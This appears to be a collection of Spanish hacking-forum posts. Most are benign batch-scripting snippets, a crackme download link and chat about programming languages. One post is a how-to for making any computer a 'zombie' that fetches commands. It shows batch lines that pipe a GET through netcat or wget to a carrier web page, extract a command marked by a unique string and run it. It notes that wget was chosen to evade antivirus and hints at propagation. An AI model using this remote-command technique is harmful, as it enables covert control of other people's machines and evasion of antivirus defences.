Mu facil creas un archivo nuevo con la cabecera que tu quieras y despues añades el contenido del archivo anterior y luego pegas el cambiazo ^^

echo "cabecera" > ArchivoNuevo.txt
for /f "tokens=*" %%a in ('type mifichero.txt') do ( call :uno %%a)
del /f /q mifichero.txt
rename ArchivoNuevo.txt mifichero.txt
:uno
set pam = %*
echo %pam% >> ArchivoNuevo.txt
goto :EOF
 

Puedes probar passwords que se instalan por defecto pero de sesiones nulas ni hablar

Bueno me e animado a subir este pequeño manual para volver "zombi" cualquier ordenado y que ejecute nuestras ordenes lo que denominare (ya que no se su denominacion tecnica) una conexion indirecta ya que nosotros dejaremos la orden en un sitio y el zombi la recogera y ejecutara, aviso que todo lo hago con batch + wget , inicialmente lo codifique utilizando netcat pero para llamar menos la atencion de los AV lo recodifique con wget


Bueno basicamente es aprovechar cualquier campo fijo (pero actualizable) para poner nuestro comando, para poder aislar la linea que contiene nuestro comando deberemos añadir una cadena singular usease una cadena unica que no se repita en el codigo fuente de la pagina a la que llamaremos

Explicare la manera de hacerlo con Netcat tmb para quede completo XD!!

Si utilizamos netcat deveremos guardar la URL en una variable <<EXCLUIENDO los caracteres ( & ) importante!! >>

Si la URL seleccionada tuviera dichos caracteres separariamos la URL en diferentes variables





Esta URL se podria directamente en una variable

set "URL=http://webPortadora/campo/archivo.html"

Esta otra URL habria que separarla

Código:



Dejandola en tres variables

Código:

set "url1=http://webPortadora/index.php?id=1"
set "url2=u=10"
set "url3=z=3"

Una vez tenemos la url dentro de una variable realizamos la peticion de la pag y aislamos la linea que nos interesa utilizando la cadena singular, recordais ... Cheesy

echo GET %URL%| nc -vn IP(webportadora) 80 | find "CadenaSingular"
o
echo GET "%url1%&%url2%&%url3%" | nc -vn IP(webportadora) 80 | find "CadenaSingular"

Por precaucion contra lammers dire que este code deberia encerrarse dentro de un FOR /F  para poder meter el resultado de la salida del COMANDO en una variable

Como la linea de la pagina a la que llamamos aparte de nuestro codigo tmb tiene su propio codigo html tendremos que recortarle los extremos a la variable tal que asi

Código:

 

set resultado=%resultado:~X,-Y%

Donde (X) seria el cacho que quitamos al principio y (-Y) seria el cacho que le comeremos al final una vez que tenemos el comando en una variable ejecutarlo es una cosa trivial

Con WGET la cosa es casi iwal con la excepcion de que wget guarda el resultado en un archivo el cual llamamos con un FOR /F y guardamos el resultado de la salida en la variable, la recortamos y ya tenemos el comando
nuevamente listo para que lo ejecutemos.


Imaginad con un buen metodo de propagacion .......


Espero os haya servido de algo

Un saludo  

No seria mejor combinar wmic con vol para saber aparte de que unidades estan disponibles que unidades estan operativas

@echo off
for /f "tokens=* skip=1" %%a in ('wmic logicaldisk get caption') do (call :uno %%a) & 
 
pause >NUL
pause
:uno
vol %1 | find "volumen" >nul: 2>&1 && echo Unidad %1 disponible y activa 
goto :eof
 

jejejeje es por darle una vuelta mas a la cosa ^^

Bueno si a alguien le interesan los crackmes aqui os dejo uno haber si conseguis sacar el pass




Un saludo gente

Bueno e codeado mi primer crackme, los expertos os descojonareis de lo facil que es pero sed comprensivos que es el primero XD!!

Resultado por MP Animaos!!

Un saludoo   

http://rapidshare.com/files/286200858/LauBuru.rar.htm

Yo ahora estoy en fase de aprendizage, e ojeado muchos libros de diferentes lenguajes y hay algo que se afirma en todos ellos.

Siempre se elige el lenguaje mas apropiado para los requerimientos del programa.

Si se necesita velocidad de ejecucion pos C o ASM o los dos

Si se precisa seguridad JAVA

etc
etc

No hay ningun lenguaje mejor o peor, solo hay lenguajes mas apropiados que otros para lo que se quiere hacer

Claro que con todos se puede hacer casi lo mismo pero algunos tendran mas rendimiento que otros y en otras cosas los otros seran mas eficientes que los unos

Lo mejor, saberlos todos XD!!!


Un saludo   

yo renombraria, uno de los ejecutables para poder operar en ellos individualmente, o tiene importancia el nombre del ejecutable?

Un saludo   

Veo que teneis el culo pelao ya en batch, bien bien asi aprendere mas, por cierto smart una pregunta los tokens de for no van de la A a la Z solamente "^" se admitiria y si asi fuera nos habilitaria el poder usar un tokens mas "^ + A-Z" pregunto pk me has dejao mosca  XD


Un saludo makinas   


PD: Para pedir el tipo de unidades, lo puede hacer un user sin pribilegios de administracion (reg query lo puede usar un user normal?)

Ya se que la unidad Ñ no existe pero bueno pues todas las letras porsiaca, antes probe con "fsutil fsinfo drivetype" y "wmic logicaldisk get caption", y para mi este es el metodo mas sencillo, haunque no el mas eficaz pero bueno, poco a poco jejejeje

Un saludo   

PD:Modifique el code para evitar esos errores,